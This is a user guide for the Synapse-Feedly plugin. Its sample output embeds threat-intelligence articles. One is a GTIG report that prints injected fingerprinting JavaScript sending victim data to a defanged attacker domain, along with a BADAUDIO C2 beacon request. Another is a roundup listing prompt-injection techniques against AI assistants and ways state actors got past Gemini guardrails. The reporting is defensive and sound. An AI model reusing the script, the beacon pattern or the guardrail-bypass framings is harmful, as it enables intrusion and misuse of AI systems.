Synapse-Feedly User Guide

Synapse-Feedly adds Storm commands that query the Feedly API with your existing Feedly API key and model the results as Synapse nodes (meta:feed for feeds, media:news for articles).

Getting Started

Check with your Synapse admin to have the Synapse-Feedly permissions enabled for your account and to find out whether you need to configure a personal Feedly API key.

Examples

Setting your personal API key

To set up a personal API key (replace myapikey with your Feedly API key; --scope self stores the config under your own user rather than for everyone):

> feedly.config.add myconfig myapikey --scope self
Synapse-Feedly config "myconfig" added

Use feedly.streams.list to list your Team's feeds. Each feed is returned as a meta:feed node; --size limits how many feeds are returned:

> feedly.streams.list --size 4
meta:feed=baba66dbc8a8c531f486a0e6342cff12
        .created = 2025/11/28 18:24:03.327
        :id = feed/https://feedly.com/f/alert/af426331-d70a-4fac-a3dc-732f851eeea6
        :name = cyberattacks x finance industry
        :source = 65f646d730ffa68037a6f23c28c5340d
        :type = feedly.stream
        :url = https://feedly.com/f/alert/af426331-d70a-4fac-a3dc-732f851eeea6.json
meta:feed=bf0cdf2828e021e58dcb3885cc21adb9
        .created = 2025/11/28 18:24:03.333
        :id = feed/https://feedly.com/f/alert/7e9237cb-6607-4b3c-8639-80c4637d34a9
        :name = threat intelligence reports x new malware
        :source = 65f646d730ffa68037a6f23c28c5340d
        :type = feedly.stream
        :url = https://feedly.com/f/alert/7e9237cb-6607-4b3c-8639-80c4637d34a9.json
meta:feed=0547e6574811cf2945368e4189487c17
        .created = 2025/11/28 18:24:03.336
        :id = feed/http://googleprojectzero.blogspot.com/feeds/posts/default
        :name = project zero
        :source = 65f646d730ffa68037a6f23c28c5340d
        :type = feedly.stream
        :url = https://googleprojectzero.blogspot.com/
meta:feed=f68639f441757b221a4246ae3a632e34
        .created = 2025/11/28 18:24:03.340
        :id = feed/https://feedly.com/f/alert/0d1b5b33-d344-429b-8f12-db780f3c2aa4
        :name = scattered spider x tactics and techniques
        :source = 65f646d730ffa68037a6f23c28c5340d
        :type = feedly.stream
        :url = https://feedly.com/f/alert/0d1b5b33-d344-429b-8f12-db780f3c2aa4.json

Use feedly.streams.get to fetch a feed's articles, IOCs and ATT&CK data

To fetch the two most recent articles for a feed as media:news nodes, skipping IOC extraction and article thumbnails (--yield returns the created media:news nodes rather than the input meta:feed node; the query assumes the feed node has already been tagged #my.feedly.newmalware):

> meta:feed#my.feedly.newmalware | feedly.streams.get --yield --size 2 --no-iocs --no-thumbnails
media:news=645a265678ced831f71a6baf59e6a54d
        .created = 2025/11/28 18:24:03.670
        :authors =
        :body = Executive Summary
                As a major player in the field of distributed denial-of-service (DDoS) detection and mitigation, it is crucial for us to closely monitor evolving threats in the DDoS landscape. Over the last year, NETSCOUT analysts observed a handful of newly emerged botnets, incapable of packet spoofing but potent sources of direct-path DDoS attacks. One of the most notable is the
                Aisuru botnet
                , which our ASERT group recently reported. Prior to Aisuru, another significant botnet, Eleven11, emerged with distinct command-and-control (C2) infrastructure characteristics.
                Key Findings
                Eleven11 botnet was discovered through the analysis of unusually large bandwidth patterns during DDoS attacks in February 2025, classifying it as part of the novel TurboMirai Internet of Things (IoT) botnet family.
                Another botnet, “RapperBot”, discovered in 2021, shares the same C2 infrastructure, indicating Eleven11 was active for far longer than initially assumed and was already previously identified as RapperBot.
                Digital traces tell a story of how the operators kept innovating the botnet to increase resiliency. One of these resiliency features is the use of OpenNIC, an alternative DNS root.
                NETSCOUT analysts saw a drop of activity in late July and early August. In mid-August, authorities revealed an arrest and the dismantling of the botnet.
                Discovery of Eleven11 Botnet
                In late February 2025, a security researcher in the field posted about a newly discovered botnet with a proclaimed record-breaking firepower exceeding 6Tbps. NETSCOUT observed portions of the attack through our ATLAS telemetry.  Building on existing tracking technology, we created an innovative pipeline that incorporates attack metadata to monitor direct-path infrastructure, using the Eleven11 botnet as an initial test case.
                Technical Analysis
                The botnet’s activity already had been tracked since 2021 and was reported under the name RapperBot in 2022. A post from
                researchers in 2022
                indicates that the botnet’s initial C2 servers were hardcoded as IPv4 addresses in the malware itself.
                In the search for more traces, ASERT discovered malware samples of this same botnet family on sandbox platforms. The reports originated in July (
                any.run
                and
                joesandbox.com
                ) and December 2024 (
                joesandbox.com
                ), revealing once more that Eleven11 existed prior to the initial announcement on Mastodon in February 2025. These reports also reveal that the botnet’s source code matured, leveraging registered domain names instead of hardcoded IPv4 addresses to connect to C2 infrastructure. These domain names, present in the .libre zone, allowed the culprits behind this botnet to dynamically reconfigure C2 servers, once compromised, without redistributing new versions of the malware. The domain names “registered” in .libre are administered by
                OpenNIC
                , an alternative DNS root known for its lax moderation that attracts illicit activity.
                Analysts at ASERT investigated the domain names from the malware sandbox reports and found that C2 server IP addresses were configured in DNS TXT records of the alternative DNS root. In the early days, addresses were encapsulated between < and > brackets, later separated by pipe characters, indicating yet another implementation on how C2 IP addresses were processed by clients.
                Reverse-engineering researchers
                also shared versions of the malware that opted for domain names registered as ICANN domain names in the new generic top-level domains (gTLDs) .live and .info. The domain names resemble a domain-generation algorithm. Although the TXT records of the OpenNIC domain names held the C2 server IPs in plain text, the ICANN records encapsulated C2 server IPs in an encrypted string.
                NETSCOUT’s threat intelligence team steadily gathered intelligence about the C2 servers. Attempts to identify the networks in which C2 infrastructure was home revealed that many of those poorly moderated networks were not only known, but also already shared with NETSCOUT’s customers via our ATLAS Intelligence Feed (AIF). AIF protects customers by enabling them to identify and block traffic originating from or destined for compromised infrastructure within their own perimeter.
                Leveraging Layer 3 Telemetry
                The botnet is known to be a modified Mirai variant. One important characteristic of Mirai-like botnets is that many of them lack the ability to spoof source addresses while generating attack traffic. This inadvertently reveals the compromised host’s true IP address when participating in attacks. We leveraged this characteristic to identify migration patterns over the internet based on known sources from the past and feed that into novel ways to attribute DDoS attacks to the botnet.
                Figure 1:
                Machine learning–enhanced analysis of Layer 3 telemetry enables NETSCOUT’s novel methodology for detecting and characterizing botnet DDoS operations, and also for attribution—in this case to the Eleven11 botnet.
                With the help of the machine learning (ML) toolbox, the threat intelligence team implemented novel methodologies to identify DDoS events linked to the botnet in question. A noticeable decline was observed in late July; the botnet went dark in early August with no apparent explanation.
                Attack Insights
                Visible in Figure 1, NETSCOUT’s ML-based attribution of DDoS events to the botnet shows a peak of weekly DDoS activity in March 2025, slowly fading off until attribution stops by the end of July. The small bars in August are likely false positives. The botnet’s C2 servers had been dismantled by authorities weeks earlier.
                Figure 2:
                A closer look at the DDoS event impact (in Gbps) reveals that the Eleven11, or RapperBot, generated particularly high volumes of traffic.
                Between late February and August, NETSCOUT attributed ~3,600 DDoS events to this botnet. High-impact DDoS attacks with hundreds of Gbps were frequently observed, as illustrated in Figure 2. The high-bandwidth characteristic was also observed in a later discovered botnet called Aisuru. This notable DDoS characteristic forms a new class of IoT botnets. Due to IP address rotation, exact counts of involved hosts are difficult to determine. Estimates characterize this botnet as a moderately sized network of infected systems in the mid five-digit range of infected hosts at peak.
                Events in August 2025
                Mid-August, the renowned cybersecurity journalist Brian Krebs published an article
                on the Eleven11 botnet
                , revealing that one of the operators was caught and arrested by authorities—an assertion confirmed via a
                press release
                . Our data validates that authorities subsequently seized C2 infrastructure and started to dismantle the botnet’s infrastructure based on a lack of continued activity following the arrest.
                Although the botnet has likely been rendered inoperable, compromised devices remain vulnerable. It is likely a matter of time until hosts are hijacked again and conscripted as a compromised node for the next botnet. Therefore, ASERT continues to analyze attack details and the migration of compromised hosts to protect our customers from future threats of this magnitude.
                Recommendations on Alternative DNS Roots
                For a large part of RapperBot’s operation, the C2 servers were configured in TXT records of an alternative DNS root with the name OpenNIC. For ordinary businesses, there is no value to having access to OpenNIC domain names. The experiment mainly attracts internet niche technologists, networking geeks, researchers, or simply malicious actors. Consequently, we recommend that customers simply block any name resolution of non-official ICANN domain names. The OpenNIC domain names are:
                .bbs
                .chan
                .cyb
                .dyn
                .geek
                .gopher
                .indy
                .libre
                .neo
                .null
                .o
                .oss
                .oz
                .parody
                .pirate
                ASERT recommends blocking these domain names on an enterprise’s resolver.
                References
                ASERT Threat Summary:
        :ext:id = mfw+vieodNEbeonvFvSX8PBLyU7fhBd7b7n0XdK0saI=_19a597a3265:e76bdc0:d074fe5d
        :published = 2025/11/06 14:00:00.000
        :summary = Executive Summary As a major player in the field of distributed denial-of-service (DDoS) detection and mitigation, it is crucial for us to closely monitor evolving threats in the DDoS landscape. Over the last year, NETSCOUT analysts observed a handful of newly emerged botnets, incapable of packet spoofing but potent...
        :title = 161 days of eleven11
        :topics = ['cyber security', 'malware', 'threat intelligence reports']
        :url = https://www.netscout.com/blog/asert/161-days-eleven11
        :url:fqdn = www.netscout.com
media:news=d374d19ab36b6c6d3fe4361a94b71c0b
        .created = 2025/11/28 18:24:03.690
        :authors = 43ab59b396315f54dc9c86de0b2826a6
        :body = Artificial Intelligence (AI) and Large Language Models (LLMs) are profoundly reshaping the cybersecurity landscape, creating a complex dual reality: they are simultaneously empowering threat actors with unprecedented offensive capabilities and arming defenders with critical new tools. This emerging dynamic defines a new frontier in cyber warfare, where the boundaries between attack and defense are increasingly blurred by AI’s transformative power. From self-modifying malware to sophisticated state-sponsored campaigns, the offensive applications of AI are accelerating, demanding equally advanced defensive countermeasures.
                The proliferation of AI-powered threats is mirrored by significant vulnerabilities within AI models themselves. Attackers are actively exploiting these weaknesses, particularly through prompt injection attacks, to facilitate data exfiltration and malicious manipulation. This expanding attack surface presents a formidable challenge for cybersecurity professionals. However, generative AI is also proving to be an invaluable asset for defenders, acting as a force multiplier that dramatically accelerates complex tasks such as malware reverse engineering, thereby enabling security teams to respond more effectively to rapidly evolving threats.
                The Escalation of AI-Powered Malware and Model Misuse
                Threat actors are increasingly leveraging AI and LLMs to develop more sophisticated malware and streamline their malicious operations. Recent findings from Google Threat Intelligence Group (GTIG) highlight this trend with the discovery of
                PROMPTFLUX
                , an experimental Visual Basic Script (VBScript) malware. This innovative threat interacts with Google’s Gemini AI model API to dynamically rewrite its own source code on an hourly basis, requesting specific VBScript obfuscation and evasion techniques. This “just-in-time” self-modification strategy is designed to bypass static signature-based detection mechanisms. While PROMPTFLUX is currently in a developmental or testing phase and lacks immediate victim compromise capabilities, it establishes persistence by saving obfuscated versions to the Windows Startup folder and attempts to propagate via removable drives and network shares. Google attributes this to a financially motivated threat actor with a broad, industry-agnostic approach.
                Beyond PROMPTFLUX, Google has identified several other LLM-powered malware variants:
                FRUITSHELL:
                A PowerShell-based reverse shell designed to evade detection by LLM-powered security systems.
                PROMPTLOCK:
                A cross-platform ransomware proof-of-concept that uses an LLM to dynamically generate and execute malicious Lua scripts.
                PROMPTSTEAL (aka LAMEHUG):
                A data miner deployed by the Russian state-sponsored actor APT28 in attacks against Ukraine, leveraging Qwen2.5-Coder-32B-Instruct via the Hugging Face API to generate commands.
                QUIETVAULT:
                A JavaScript-based credential stealer specifically targeting GitHub and NPM tokens.
                State-sponsored threat actors are also actively misusing Gemini AI to enhance their cyber operations. Their tactics include:
                China-nexus actors:
                Utilizing Gemini for initial reconnaissance, crafting phishing techniques, delivering payloads, and seeking assistance with lateral movement and data exfiltration. They often bypass AI guardrails by framing prompts as Capture-The-Flag (CTF) exercises.
                Iranian groups (e.g., APT41, MuddyWater/Mango Sandstorm):
                APT41 has sought aid with code obfuscation and developing C++ and Golang code for tools, including a C2 framework named OSSTUN. MuddyWater has conducted extensive research for custom malware development and circumvented safety barriers by impersonating students.
                APT42 (aka Charming Kitten and Mint Sandstorm):
                Crafting phishing campaign materials, translating articles, researching Israeli defense, and developing a “Data Processing Agent” to convert natural language requests into SQL queries for sensitive data insights.
                North Korean actors (e.g., UNC1069/CryptoCore/MASAN):
                Generating lure material for social engineering, developing cryptocurrency-stealing code, crafting fraudulent software update instructions to extract credentials, and employing deepfake images and videos.
                TraderTraitor:
                Employing AI for code development, exploit research, and tool improvement.
                Exploitable Weaknesses: Vulnerabilities in AI Models
                Even leading AI models are not immune to attack, exhibiting various vulnerabilities that can be exploited for data exfiltration and malicious manipulation. Tenable Research identified seven distinct vulnerabilities and attack techniques in OpenAI’s GPT-4o and GPT-5 models, some of which have since been addressed. These issues primarily facilitate indirect prompt injection attacks, where the LLM’s expected behavior is subtly manipulated to perform unintended actions or leak sensitive data.
                Key prompt injection techniques and vulnerabilities identified include:
                Indirect Prompt Injection via Browsing Context:
                Malicious instructions embedded in web page comments summarized by ChatGPT.
                Zero-Click Indirect Prompt Injection in Search Context:
                Malicious instructions indexed by search engines, triggered by natural language queries to the LLM.
                Prompt Injection via One-Click Crafted Links:
                Exploiting specially crafted links.
                Safety Mechanism Bypass:
                Abusing Bing’s allow-listed URLs to mask malicious links.
                Conversation Injection:
                Inserting malicious instructions into websites to cause unintended replies in subsequent conversational contexts.
                Malicious Content Hiding:
                Leveraging markdown rendering bugs to conceal harmful content.
                Memory Injection:
                Poisoning ChatGPT’s memory with hidden instructions from summarized websites.
                Further research has revealed a broader range of prompt injection and AI security concerns:
                PromptJacking:
                Exploiting Remote Code Execution (RCE) vulnerabilities in Anthropic Claude’s connectors for unsanitized command injection.
                “Claude pirate”:
                Abusing Claude’s Files API for data exfiltration.
                “Agent session smuggling”:
                Leveraging the Agent2Agent (A2A) protocol to inject instructions into cross-agent communication sessions.
                “Prompt inception”:
                Using prompt injections to amplify bias or falsehoods, leading to disinformation.
                “Shadow escape”:
                A zero-click attack to steal sensitive data from interconnected systems via Model Context Protocol (MCP) setups.
                Microsoft 365 Copilot Vulnerabilities:
                Found susceptible to indirect prompt injection using Mermaid diagrams and CSS for arbitrary data exfiltration.
                CamoLeak (CVSS: 9.6) in GitHub Copilot Chat:
                A critical vulnerability allowing covert exfiltration of secrets and source code from private repositories and full control over Copilot’s responses through a combination of Content Security Policy (CSP) bypass and remote prompt injection via hidden comments in pull requests.
                LatentBreak:
                A white-box jailbreak attack that generates natural adversarial prompts to evade safety mechanisms.
                These underlying issues underscore that prompt injection remains a systemic problem with LLMs, not expected to be systematically fixed in the near future. Additionally, concerns like “LLM brain rot” from training on “junk data,” the feasibility of backdooring AI models with a small number of poisoned documents, and “Moloch’s Bargain”—where competitive optimization of LLMs can inadvertently lead to safety concerns like deceptive product representation—further complicate the AI security landscape.
                Generative AI as a Force Multiplier for Reverse Engineering
                In the face of these escalating threats, generative AI, particularly advanced models like GPT-5, is proving to be a significant asset for cybersecurity defenders. It dramatically accelerates the analysis of complex and evasive malware such as XLoader, which presents considerable challenges due to its runtime decryption, multiple layers of encryption, obfuscated API calls, injections into system processes, extensive sandbox evasion techniques, encrypted network traffic, and camouflaged C2 addresses. The rapid development cadence of such malware quickly renders previous research obsolete.
                Check Point Research has demonstrated two complementary workflows for leveraging GPT-5 in malware analysis:
                Live Model Context Protocol (MCP) Integration:
                This approach grants the LLM direct access to analysis tools like IDA Pro, x64dbg, and VMware. This enables real-time querying, memory inspection, and debugger control, facilitating live data pulling and iterative “experiment and observe” cycles during analysis.
                “Offline” Data Pipeline with ChatGPT:
                This method involves exporting a full static snapshot of the malware to ChatGPT’s environment. The AI then performs static analysis, generates, refines, and executes Python scripts against the binary within its cloud sandbox. This offers benefits such as no persistent local session, easy repeatability, and safe script execution.
                During the XLoader analysis, researchers refined the process by:
                Enforcing an “evidence-first” rule to prevent AI “guessing” missing values, requiring direct quotes from exported data.
                Banning cosmetic transformations and requiring the AI to identify actual errors in output shaping.
                Implementing a “local-first” rule to mitigate requests for already-provided data.
                In a specific case study using GPT-5 for XLoader analysis, the AI demonstrated impressive capabilities:
                Initial Analysis:
                Correctly identified RC4 implementation, determined the sample was packed, inferred similarities to XLoader, detected API call obfuscation, and pinpointed the handover to decrypted code.
                Payload Decryption:
                Identified two rounds of RC4 decryption and collected relevant virtual addresses and offsets. Human intervention was still required to obtain real-time keys via MCP.
                Function Decryption Schemes:
                Partially tackled XLoader’s complex function decryption involving 6-byte or 4-byte markers, XOR modifiers, multi-layer RC4, and patching. While AI reimplemented algorithms and located some keys, human assistance was needed for a universal script due to scattered key derivation logic.
                API Call Deobfuscation:
                AI described resolution algorithms and generated IDAPython scripts to deobfuscate API calls, though this required human interaction for testing and error correction.
                String Decryption Routines:
                Analyzed RC4-based string decryption, leading to an IDAPython script that successfully decrypted 175 strings.
                Domain Decryption:
                Successfully analyzed the domain generation function, which stores encrypted domain names in Base64 with multiple layers of RC4 encryption and scattered key material. Human assistance was needed to locate specific keys (e.g.,
                ctx+0x23D0
                ,
                SALT_DWORD
                ) not directly referenced or highly obfuscated. Once provided, AI successfully decrypted domain names and generated 4-character URL tags.
                Ultimately, generative AI significantly reduces the time required for mechanical reverse engineering tasks such as triage, deobfuscation, and scripting, acting as a powerful “force multiplier.” However, human expertise remains crucial for addressing the most sophisticated protections, fine-tuning AI outputs, and overcoming limitations in AI’s independent reasoning or data access. The arms race between malware authors and defenders is poised to accelerate further with the broader adoption of AI in both offensive and defensive cybersecurity strategies.
        :ext:id = dsDalUl/A1RgwYSQs7wa6KIBQ2BGKotFk2bwZL4HMaU=_19a55e2c619:dfaab07:d074fe5d
        :published = 2025/11/05 21:15:20.000
        :summary = As AI cybersecurity rapidly evolves, a new arms race emerges where artificial intelligence fuels both sophisticated malware and powerful defensive strategies. This article explores the latest in AI-powered threats, critical model vulnerabilities, and how generative AI is becoming an indispensable tool for cyber defense.
        :title = ai cybersecurity: navigating the double-edged sword of advanced threats and defense
        :topics = ['ai cybersecurity', 'ai threats', 'ai-powered malware', 'artificial intelligence', 'crime', 'cyber news & updates', 'cyber security', 'defense industry', 'hacking', 'proof of exploit', 'threat intelligence reports']
        :url = https://cyberwarzone.com/2025/11/05/ai-cybersecurity-navigating-the-double-edged-sword-of-advanced-threats-and-defense/
        :url:fqdn = cyberwarzone.com
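Both feedly.streams.get invocations on this page lift the feed by the tag #my.feedly.newmalware, which the page assumes already exists. The Storm queries below are an added example, not code from the Synapse-Feedly documentation or the power-up itself: they apply that tag using the feed name shown in the feedly.streams.list output, pull recent articles with the same feedly.streams.get flags used above, and keep only articles published since a given date. The tag my.triage.new and the final refs edge walk are assumptions of this example; the page does not show how Synapse-Feedly links an article to the IOCs it extracts, so verify the edge name in your Cortex before relying on it. Each blank-line-separated block is its own Storm query.

```storm
// Added example, not from the Synapse-Feedly docs. Assumes the feed named
// "threat intelligence reports x new malware" from the feedly.streams.list output above.

// 1. Lift the feed by its name and tag it so later queries can refer to it by tag.
meta:feed:name="threat intelligence reports x new malware" [ +#my.feedly.newmalware ]

// 2. Pull the latest articles (IOC extraction enabled, thumbnails skipped),
//    keep only those published on or after 1 Nov 2025, and tag them for triage.
//    --yield returns the media:news nodes rather than the meta:feed node.
meta:feed#my.feedly.newmalware
| feedly.streams.get --yield --size 25 --no-thumbnails
| +:published>="2025/11/01"
| [ +#my.triage.new ]

// 3. Assumption (not shown on this page): Synapse power-ups commonly link an
//    article to its extracted indicators with "refs" light edges. If Synapse-Feedly
//    does the same, this walks from the triaged articles to those indicator nodes.
media:news#my.triage.new -(refs)> *
```

Re-running step 2 later is safe: feedly.streams.get deduplicates on the media:news GUID, so the same article is not created twice, and the date filter keeps already-seen old articles out of the triage tag.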

To fetch the two most recent articles together with all associated data (IOCs, ATT&CK data and thumbnails); the STIX ingest warnings below are informational and indicate relationship types in the Feedly bundle that the ingest does not map onto the Synapse model:

> meta:feed#my.feedly.newmalware | feedly.streams.get --yield --size 2
WARNING: STIX bundle ingest has no relationship definition for: ('threat-actor', 'originates-from', 'location').
WARNING: STIX bundle ingest has no relationship definition for: ('intrusion-set', 'originates-from', 'location').
media:news=4290ba830e61b24c8ee76d816584085e
        .created = 2025/11/28 18:24:03.886
        :authors =
        :body = Written by: Harsh Parashar, Tierra Duncan, Dan Perez
                Google Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by APT24, a People's Republic of China (PRC)-nexus threat actor. Spanning three years, APT24 has been deploying BADAUDIO, a highly obfuscated first-stage downloader used to establish persistent access to victim networks.
                While earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24 has recently pivoted to using more sophisticated vectors targeting organizations in Taiwan. This includes the repeated compromise of a regional digital marketing firm to execute supply chain attacks and the use of targeted phishing campaigns.
                This report provides a technical analysis of the BADAUDIO malware, details the evolution of APT24's delivery mechanisms from 2022 to present, and offers actionable intelligence to help defenders detect and mitigate this persistent threat.
                As part of our efforts to combat serious threat actors, GTIG uses the results of our research to improve the safety and security of Google’s products and users. Upon discovery, all identified websites, domains, and files are added to the
                Safe Browsing
                blocklist in order to protect web users across major browsers. We also conducted a series of victim notifications with technical details to compromised sites,
                enabling affected organizations to secure their sites and prevent future infections.
                Figure 1: BADAUDIO campaign overview
                Payload Analysis: BADAUDIO and Cobalt Strike Beacon Integration
                The BADAUDIO malware is a custom first-stage downloader written in C++ that downloads, decrypts, and executes an AES-encrypted payload from a hard-coded command and control (C2) server. The malware collects basic system information, encrypts it using a hard-coded AES key, and sends it as a cookie value with the GET request to fetch the payload. The payload, in one case identified as Cobalt Strike Beacon, is decrypted with the same key and executed in memory.
                GET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1
                Host: wispy[.]geneva[.]workers[.]dev
                Cookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NFjqOBqFQ==
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                Connection: Keep-Alive
                Cache-Control: no-cache

                --------------------------

                GET
                cfuvid=Iewmfm8VY6Ky-3-E-OVHnYBszObHNjr9MpLbLHDxX056bnRflosOpp2hheQHsjZFY2JmmO8abTekDPKzVjcpnedzNgEq2p3YSccJZkjRW7-mFsd0-VrRYvWxHS95kxTRZ5X4FKIDDeplPFhhb3qiUEkQqqgulNk_U0O7U50APVE
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
                Connection: Keep-Alive
                Cache-Control: no-cache
                Figure 2: BADAUDIO code sample
                The malware is engineered with control flow flattening—a sophisticated obfuscation technique that systematically dismantles a program's natural, structured logic. This method replaces linear code with a series of disconnected blocks governed by a central "dispatcher" and a state variable, forcing analysts to manually trace each execution path and significantly impeding both automated and manual reverse engineering efforts.
                Figure 3: Control flow flattening heavily obfuscates BADAUDIO malware (
                expand image
                )
                BADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order Hijacking (MITRE ATT&CK T1574.001) for execution via legitimate applications. Recent variants observed indicate a refined execution chain: encrypted archives containing BADAUDIO DLLs along with VBS, BAT, and LNK files.
                These supplementary files automate the placement of the BADAUDIO DLL and a legitimate executable into user directories, establish persistence through legitimate executable startup entries, and trigger the DLL sideloading. This multi-layered approach to execution and persistence minimizes direct indicators of compromise.
                Upon execution, BADAUDIO collects rudimentary host information: hostname, username, and system architecture. This collected data is then hashed and embedded within a cookie parameter in the C2 request header. This technique provides a subtle yet effective method for beaconing and identifying compromised systems, complicating network-based detection.
                In one of these cases, the subsequent payload, decrypted using a hard-coded AES key, has been confirmed as Cobalt Strike Beacon. However, it is not confirmed that Cobalt Strike is present in every instance. The Beacon payload contained a relatively unique watermark that was previously observed in a separate APT24 campaign, shared in the Indicators of Compromise section.
                Cobalt Strike watermarks
                are a unique value generated from and tied to a given "CobaltStrike.auth" file. This value is embedded as the last 4 bytes for all BEACON stagers and in the embedded configuration for full backdoor BEACON samples.
                Campaign Overview: BADAUDIO Delivery Evolves
                Over three years, APT24 leveraged various techniques to deliver BADAUDIO, including strategic web compromises, repeated supply-chain compromise of a regional digital marketing firm in Taiwan, and spear phishing.
                Figure 4: BADAUDIO campaign overview
                Public Strategic Web Compromise Campaign
                Beginning in November 2022 we observed over 20 compromised websites spanning a broad array of subjects from regional industrial concerns to recreational goods, suggesting an opportunistic approach to initial access with true targeting selectively executed against visitors the attackers identified via fingerprinting. The legitimate websites were weaponized through the injection of a malicious JavaScript payload.
                Figure 5: Strategic web compromise attack flow to deliver BADAUDIO malware
                This script exhibited an initial layer of targeting, specifically excluding macOS, iOS, Android, and various Microsoft Internet Explorer/Edge browser variants to focus exclusively on Windows systems. This selectivity suggests an adversary immediately narrowing their scope to optimize for a specific, likely high-value, victim profile.
                The injected JavaScript performed a critical reconnaissance function by employing the FingerprintJS library to generate a unique browser fingerprint. This fingerprint, transmitted via an HTTP request to an attacker-controlled domain, served as an implicit validation mechanism. Upon successful validation, the victim was presented with a fabricated pop-up dialog, engineered to trick the user into downloading and executing BADAUDIO malware.
                $(window).ready(function() {
                    var userAgent = navigator.userAgent;
                    var isIE = userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1;
                    var isEdge = userAgent.indexOf("Edge") > -1 && !isIE;
                    var isIE11 = userAgent.indexOf('Trident') > -1 && userAgent.indexOf("rv:11.0") > -1;
                    var isMac = userAgent.indexOf('Macintosh') > -1;
                    var isiPhone = userAgent.indexOf('iPhone') > -1;
                    var isFireFox = userAgent.indexOf('Firefox') > -1;
                    if (!isIE && !isEdge && !isIE11 && !isMac && !isiPhone && !isFireFox) {
                        var tag_script = document.createElement("script");
                        tag_script.type = "text/javascript";
                        tag_script.src = "https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js";
                        tag_script.onload = "initFingerprintJS()";
                        document.body.appendChild(tag_script);
                        if (typeof(callback) !== "undefined") {
                            tag_script.onload = function() {
                                callback();
                            }
                        }
                        function callback() {
                            var option = {
                                excludes: {
                                    screenResolution: true,
                                    availableScreenResolution: true,
                                    enumerateDevices: true
                                }
                            }
                            new Fingerprint2.get(option, function(components) {
                                var values = components.map(function(component) {
                                    return component.value
                                })
                                var murmur = Fingerprint2.x64hash128(values.join(''), 31);
                                console.log(murmur)
                                var script_tag = document.createElement("script");
                                script_tag.setAttribute("src", "https://www[.]twisinbeth[.]com/query.php?id=" + murmur);
                                document.body.appendChild(script_tag);
                            });
                        }
                    }
                });
                Figure 6: Early malicious fingerprinting JS used in strategic web compromise campaigns
                Figure 7: Example of attacker fake update pop-up dialog impersonating Chrome to lure targets to download and execute BADAUDIO malware
                The attackers consistently shift their infrastructure, using a mix of newly registered domains and domains they have previously compromised. We last observed this tactic in early September 2025.
                Escalation: Supply Chain Compromise for Strategic Web Compromises at Scale
                In July 2024, APT24 compromised a regional digital marketing firm in Taiwan, a supply chain attack that impacted more than 1,000 domains. Notably, the firm experienced multiple re-compromises over the last year, demonstrating APT24's persistent commitment to the operation.
                We initiated a multifaceted remediation effort to disrupt these threats. In addition to developing custom logic to identify and block the modified, malicious JavaScript, GTIG distributed victim notifications to the individual compromised websites and the compromised marketing firm. These notifications provided specific details about the threat and the modifications made to the original script, enabling affected organizations to secure their sites and prevent future infections.
                In the first iteration of the supply chain compromise, APT24 injected the malicious script into a widely used JavaScript library (MITRE ATT&CK T1195.001) provided by the firm, leveraging a typosquatting domain to impersonate a legitimate Content Delivery Network (CDN). The deobfuscated JavaScript reveals a multi-stage infection chain:
                Dynamic Dependency Loading: The script dynamically loads legitimate jQuery and FingerprintJS2 libraries (MITRE ATT&CK T1059.007) from a public CDN if not already present, ensuring consistent execution across diverse web environments.
                Multi-Layer JS Concealment: During a re-compromise discovered in July 2025, the adversary took additional steps to hide their malicious code. The highly obfuscated script (MITRE ATT&CK T1059) was deliberately placed within a maliciously modified JSON file served by the vendor, which was then loaded and executed by another compromised JavaScript file. This tactic effectively concealed the final payload in a file type and structure not typically associated with code execution.
                Advanced Fingerprinting: FingerprintJS2 is utilized to generate an x64hash128 browser and environmental fingerprint (MITRE ATT&CK T1082). The x64hash128 is the resulting 128-bit hash value produced by the MurmurHash3 algorithm, which processes a large input string of collected browser characteristics (such as screen resolution, installed fonts, and GPU details) to create a unique, consistent identifier for the user's device.
                Covert Data Exfiltration and Staging: A POST request, transmitting Base64-encoded reconnaissance data (including host, url, useragent, fingerprint, referrer, time, and a unique identifier), is sent to an attacker's endpoint (MITRE ATT&CK T1041).
                Adaptive Payload Delivery: Successful C2 responses trigger the dynamic loading of a subsequent script from a URL provided in the response's data field. This cloaked redirect leads to BADAUDIO landing pages, contingent on the attacker's C2 logic and fingerprint assessment (MITRE ATT&CK T1105).
                Tailored Targeting: The compromise in June 2025 initially employed conditional script loading based on a unique web ID (the specific domain name) related to the website using the compromised third-party scripts. This suggests tailored targeting, limiting the strategic web compromise (MITRE ATT&CK T1189) to a single domain. However, for a ten-day period in August, the conditions were temporarily lifted, allowing all 1,000 domains using the scripts to be compromised before the original restriction was reimposed.
                Figure 8: Compromised JS supply chain attack to deliver BADAUDIO malware
                Targeted Phishing Campaigns
                Complementing their broader web-based attacks, APT24 concurrently conducted highly targeted social engineering campaigns. Lures, such as an email purporting to be from an animal rescue organization, leveraged social engineering to elicit user interaction and drive direct malware downloads from attacker-controlled domains.
                Separate campaigns abused legitimate cloud storage platforms including Google Drive and OneDrive to distribute encrypted archives containing BADAUDIO. Google protected users by diverting these messages to spam, disrupting the threat actor’s effort to leverage reputable services in their campaigns.
                APT24 included pixel tracking links, confirming email opens and potentially validating target interest for subsequent exploitation. This dual-pronged approach—leveraging widely trusted cloud services and explicit tracking—enhances their ability to conduct effective, personalized campaigns.
                Outlook
                This nearly three-year campaign is a clear example of the continued evolution of APT24’s operational capabilities and highlights the sophistication of PRC-nexus threat actors. The use of advanced techniques like supply chain compromise, multi-layered social engineering, and the abuse of legitimate cloud services demonstrates the actor's capacity for persistent and adaptive espionage.
                This activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employing stealthy tactics to avoid detection. GTIG actively monitors ongoing threats from actors like APT24 to protect users and customers. As part of this effort, Google continuously updates its protections and has taken specific action against this campaign.
